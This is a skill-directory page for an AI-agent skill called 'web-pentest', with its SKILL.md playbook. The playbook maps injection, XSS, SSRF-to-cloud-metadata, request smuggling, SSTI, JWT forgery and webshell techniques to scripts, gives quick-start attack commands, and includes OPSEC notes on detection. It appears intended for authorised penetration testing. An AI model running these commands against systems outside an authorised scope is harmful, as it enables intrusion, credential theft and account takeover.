web-pentest
Use when pentesting a web application or API — injection, XSS/CSP, SSRF/cloud-metadata, HTTP desync & cache poisoning, SSTI/prototype-pollution/deserialization, JWT/OAuth/GraphQL/IDOR, business logic & single-packet race
Install / Use
npx skills add hypnguyen1209/offensive-claude --skill web-pentestInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
SecuritySupported Platforms
Our assessment of web-pentest
web-pentest scores 86/100 on our quality scale, 726th of 1,096 Security skills we index.
Its SKILL.md is 11 KB long, well organised into 18 sections with 1 code example: a thorough specification that gives an agent plenty to work with.
It has 377 GitHub stars, a meaningful sign that others use it.
Maintenance, license and trust
- The repository was last updated 14 days ago, so web-pentest is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
Safety scan
No issues foundOur scan of the whole file found no instruction hijacking, hidden characters, credential access, data exfiltration or destructive commands.
Automated pattern scan on 2026-10-05. It catches known dangerous patterns, not every risk — read a skill before letting an agent act on it.
web-pentest compared with similar skills
All 4 of these similar skills score higher than web-pentest; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| web-pentest (this skill)by hypnguyen1209 | 86 | 377 | 14d ago | SKILL.md |
| claude-memby thedotmack | 100 | 96.1k | today | CLAUDE.md |
| Agent-Reachby Panniantong | 100 | 90.8k | 19d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.4k | today | CLAUDE.md |
| Scraplingby D4Vinci | 100 | 85.7k | today | MCP Server |
Frequently asked questions
- How do I install web-pentest?
- Run
npx skills add hypnguyen1209/offensive-claude --skill web-pentest. The install tabs above show the steps for each supported agent. - Which AI agents does web-pentest work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is web-pentest safe to use?
- Our scan of the whole file found no instruction hijacking, hidden characters, credential access, data exfiltration or destructive commands. It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is web-pentest still maintained?
- The repository was last updated 14 days ago, so web-pentest is actively maintained.
Skill content
View source on GitHubname: web-pentest description: Use when pentesting a web application or API — injection, XSS/CSP, SSRF/cloud-metadata, HTTP desync & cache poisoning, SSTI/prototype-pollution/deserialization, JWT/OAuth/GraphQL/IDOR, business logic & single-packet race metadata: type: offensive phase: exploitation tools: burpsuite, sqlmap, ffuf, feroxbuster, nuclei, httpx, curl, wfuzz, dalfox, commix, jwt_tool, ysoserial, http-request-smuggler mitre: [T1190, T1059, T1552.005, T1078, T1539, T1505.003] kill_chain: phase: [delivery, exploit] step: [3, 4] attck_tactics: [TA0001, TA0002] attck_techniques: [T1190, T1059.007, T1552.005, T1078, T1539, T1505.003, T1557] depends_on: [recon-osint, vulnerability-analysis] feeds_into: [exploit-development, cloud-security, network-attack] inputs: [attack_surface_map, technology_fingerprint] outputs: [finding_record, web_vulnerability_list] references:
- references/injection-sqli-cmdi.md
- references/xss-csp-clientside.md
- references/ssrf-cloud-metadata.md
- references/http-desync-cache.md
- references/ssti-deserialization.md
- references/auth-api-access-control.md
- references/business-logic-abuse.md
- references/proxy-mcp-integration.md scripts:
- scripts/desync_probe.py
- scripts/jwt_forge.py
- scripts/ssrf_toolkit.py
- scripts/proto_ssti_gadgets.py
- scripts/graphql_audit.py
- scripts/race_single_packet.py
- scripts/xss_csp_forge.py
- scripts/session_entropy.py
Web Application Penetration Testing
When to Activate
- Web application security assessment (black/grey/white box)
- API security testing (REST, GraphQL, WebSocket)
- Authentication & session management testing (JWT, OAuth/OIDC, SAML)
- Business-logic and race-condition hunting
- WAF/CSP bypass, filter evasion, and CDN-layer attacks (desync, cache)
- Validating modern 2024-2026 vectors: HTTP/1.1 desync (0.CL/TE.0), SSRF->cloud metadata, prototype-pollution->RCE, SSTI sandbox escapes
Input-Signal Routing (what to test when you see X)
Fast test selection — map an observed parameter/behavior to the right deep-dive:
| Input signal you observe | Test for | Go to |
|--------------------------|----------|-------|
| id, uid, order_id, account, GUID/sequential ref | IDOR/BOLA, access control | references/auth-api-access-control.md |
| url, next, callback, dest, webhook, image_url | SSRF + cloud metadata, open redirect, OAuth chain | references/ssrf-cloud-metadata.md |
| price, qty, coupon, balance, status, state change | business logic + single-packet race | references/http-desync-cache.md (race) |
| template/preview/name reflected in output | SSTI -> RCE, reflected XSS | references/ssti-deserialization.md |
| search/filter/sort reflected; q=, error echoes input | SQLi, XSS, command injection | references/injection-sqli-cmdi.md |
| token, jwt, Authorization, Cookie, OAuth state | JWT forgery, session/OAuth flaws | references/auth-api-access-control.md |
| empty/missing/session=; login accepts no creds; user[$ne]= | auth-check tampering (empty/null/NoSQL/type-juggle/HPP), token prediction | references/auth-api-access-control.md |
| serialized blob / base64 object / __proto__ | deserialization, prototype pollution | references/ssti-deserialization.md |
| behind CDN/cache; X-Forwarded-*; keyed params | desync (0.CL/TE.0), cache poisoning | references/http-desync-cache.md |
Technique Map
| Technique | ATT&CK | CWE | Reference | Script | |-----------|--------|-----|-----------|--------| | SQL injection (UNION/blind/NoSQL) | T1190 | CWE-89 | references/injection-sqli-cmdi.md | scripts/ssrf_toolkit.py (probe pattern) / sqlmap | | OS command / argument injection | T1059 | CWE-78 / CWE-88 | references/injection-sqli-cmdi.md | - | | Reflected/stored/DOM XSS | T1059.007 | CWE-79 | references/xss-csp-clientside.md | scripts/xss_csp_forge.py | | CSP bypass / script gadgets | T1059.007 | CWE-1021 | references/xss-csp-clientside.md | scripts/xss_csp_forge.py | | Client-side prototype pollution -> XSS | T1059.007 | CWE-1321 | references/xss-csp-clientside.md | scripts/xss_csp_forge.py | | SSRF + cloud metadata theft | T1552.005 | CWE-918 | references/ssrf-cloud-metadata.md | scripts/ssrf_toolkit.py | | IMDSv2 bypass (Axios gadget) | T1552.005 | CWE-113 | references/ssrf-cloud-metadata.md | scripts/proto_ssti_gadgets.py | | HTTP request smuggling / desync | T1190 | CWE-444 | references/http-desync-cache.md | scripts/desync_probe.py | | Web cache poisoning / deception | T1557 | CWE-525 | references/http-desync-cache.md | scripts/desync_probe.py | | SSTI -> RCE (Jinja2/Twig/FM/...) | T1059 | CWE-1336 | references/ssti-deserialization.md | scripts/proto_ssti_gadgets.py | | Server-side prototype pollution -> RCE | T1059 | CWE-1321 | references/ssti-deserialization.md | scripts/proto_ssti_gadgets.py | | Insecure deserialization (Java/.NET/PHP) | T1059 | CWE-502 | references/ssti-deserialization.md | ysoserial / ysoserial.net | | JWT forgery (none/confusion/jku/jwk/kid) | T1078 | CWE-347 | references/auth-api-access-control.md | scripts/jwt_forge.py | | Auth-check tampering (empty/null/NoSQL-op/type-juggle/HPP) | T1556 | CWE-287 / CWE-697 / CWE-943 | references/auth-api-access-control.md | - | | Session token prediction (weak PRNG/entropy) | T1539 | CWE-330 | references/auth-api-access-control.md | scripts/session_entropy.py | | OAuth/OIDC/SAML auth bypass | T1078 | CWE-287 | references/auth-api-access-control.md | scripts/jwt_forge.py | | GraphQL abuse (batch/alias/depth) | T1190 | CWE-770 | references/auth-api-access-control.md | scripts/graphql_audit.py | | IDOR / BOLA / mass assignment | T1078 | CWE-639 / CWE-915 | references/auth-api-access-control.md | - | | Race condition (single-packet) | T1190 | CWE-362 | references/auth-api-access-control.md | scripts/race_single_packet.py | | Business-logic abuse (price/refund/workflow/race) | T1539 | CWE-841 | references/business-logic-abuse.md | scripts/race_single_packet.py | | HTTP Parameter Pollution (HPP) | T1190 | CWE-235 / CWE-88 | references/injection-sqli-cmdi.md | - | | File-upload -> webshell / RCE | T1505.003 | CWE-434 | references/injection-sqli-cmdi.md | - |
Quick Start
# 0. Intake from recon-osint: hosts, tech fingerprint, endpoints, params.
# Spider + content discovery
ffuf -u https://t/FUZZ -w raft-large.txt -mc all -fc 404 -o ffuf.json
nuclei -u https://t -severity critical,high -tags cve,exposure,misconfig
# 1. Injection — automated SQLi, manual cmdi
sqlmap -r request.txt --batch --level 3 --risk 2 --tamper=between,space2comment
# 2. XSS / CSP
python3 scripts/xss_csp_forge.py contexts --collector atk.tld
python3 scripts/xss_csp_forge.py csp "$(curl -sI https://t | grep -i content-security)"
# 3. SSRF -> cloud metadata
python3 scripts/ssrf_toolkit.py probe "https://t/api/fetch?url=FUZZ" --collab abc.oast.fun
python3 scripts/ssrf_toolkit.py cloud --provider aws
# 4. HTTP desync (2024-2026 vectors: cl0/expect/options/te0)
python3 scripts/desync_probe.py https://t --probe all --verbose
# 5. SSTI / prototype pollution / deserialization
python3 scripts/proto_ssti_gadgets.py detect
python3 scripts/proto_ssti_gadgets.py ssti --engine jinja2 --cmd "id"
python3 scripts/proto_ssti_gadgets.py proto --cmd "id"
# 6. Auth & API
python3 scripts/jwt_forge.py hs-confuse "$JWT" --pubkey pub.pem --claim role=admin
python3 scripts/graphql_audit.py introspect https://t/graphql
# 7. Logic / race
python3 scripts/race_single_packet.py https://t/redeem -d "code=X" -n 30 -H "Cookie: s=..."
# -> feed each confirmed issue into templates/exploit/findings/ with
# severity, CWE, CVSS, PoC, evidence, ATT&CK ID, remediation.
OPSEC & Detection (summary)
| Technique | Telemetry / IOC | Detection (Sigma/EDR) | OPSEC note |
|-----------|-----------------|------------------------|------------|
| SQLi / cmdi | SQL keywords, SLEEP/WAITFOR, web-svc spawning sh/curl | webserver regex Sigma; EDR child-shell from www-data | time-based is slow+noisy; --random-agent --delay, in-band reads first |
| XSS / CSP / client-PP | <script, onerror=, __proto__ in params; CSP report-uri hits | webserver regex; Trusted-Types violation alerts | persistent __proto__ can break shared cached pages — avoid |
| SSRF / metadata | hits to 169.254.169.254 / metadata hosts from app tier | proxy Sigma; GuardDuty credential-exfil | stop at proving token retrieval; rotate collaborator subdomains |
| HTTP desync / cache | CL+TE together, obs-fold, Expect on OPTIONS to CDN | proxy Sigma; reject ambiguous framing | poisons co-tenant traffic — scoped only, never POST-smuggle prod |
| SSTI / PP / deser | {{ }}/${ }, NODE_OPTIONS, rO0AB, JNDI egress | webserver/body Sigma; EDR java->LDAP/RMI | id probe first; reverse shells trip EDR; revert polluted config |
| JWT / OAuth / GraphQL | alg:none, unknown jku/kid, multi-op GraphQL body | app Sigma; failed-verify spikes | forged-JWT attempts alert; cap GraphQL brute wordlist/rate |
| Race (single-packet) | burst of near-simultaneous mutating requests | rate-by-endpoint Sigma in 1s window | keep -n low; document state mutated for cleanup |
Deep Dives
- references/injection-sqli-cmdi.md — SQLi (UNION/blind/error/NoSQL), OS command & argument injection, HTTP Parameter Pollution (HPP), file-upload -> webshell/RCE, sqlmap tamper workflow, modern WAF/Unicode evasion.
- references/xss-csp-clientside.md — XSS contexts, DOM sinks, CSP bypass + script gadgets, client-side prototype pollution -> XSS, mXSS/sanitizer bypass.
- references/ssrf-cloud-metadata.md — SSRF parser confusion, gopher/redis, AWS/GCP/Azure metadata, IMDSv2 reality + Axios bypass, HTML-to-PDF switch, 2024-2026 CVEs (Azure OpenAI, Oracle EBS, Next.js, ColdFusion).
- references/http-desync-cache.md — CL.TE/TE.CL, TE.0 (2024), 0.CL/Expect & CVE-2025-32094 (Akamai), TE.TE chunk-ext, cache poisoning/deception ("Gotta cache 'em all", ACM CCS 2024), pipelining-vs-desync caveat.
- references/ssti-deserialization.md — per-engine SSTI RCE, sandbox escapes (CVE-2024-22195, Frappe/XWiki/Yeti), Node prototype-pollution -> RCE (GHunter, NODE_OPTIONS --import), Java/.NET/PHP deserialization gadget chains.
- references/auth-api-access-control.md — JWT forgery, OAuth/OIDC/SAML, GraphQL batch/alias/depth abuse, session & auth-check tampering (empty/null/falsy value, NoSQL-operator + type-juggling + HPP into auth), session token prediction/entropy (scripts/session_entropy.py), test-account setup for cross-identity testing, IDOR/BOLA/mass assignment, and the HTTP/2 single-packet race attack.
- references/business-logic-abuse.md — model the intended state machine, then break transitions: price/quantity/coupon tampering, refund/payout & single-packet races, workflow-step skip, idempotency gaps, tenant/role confusion, flaw-chaining.
- references/proxy-mcp-integration.md — driving a live Burp/Caido proxy MCP for
ground-truth traffic + replay-with-auth, with mandatory header redaction
(
redact_headers.py) at the data boundary.
Related Skills
claude-mem
96.1kPersistent Context Across Sessions for Every Agent – Captures everything your agent does during sessions, compresses it with AI, and injects relevant context back into future sessions. Works with Claude Code, OpenClaw, Codex, Gemini, Hermes, Copilot, OpenCode + More
Agent-Reach
90.8kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.4kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
Scrapling
85.7k🕷️ An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Don't be shy, join here: https://discord.gg/EMgGbDceNQ and follow here for daily tips and tricks: https://x.com/Scrapling_dev
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
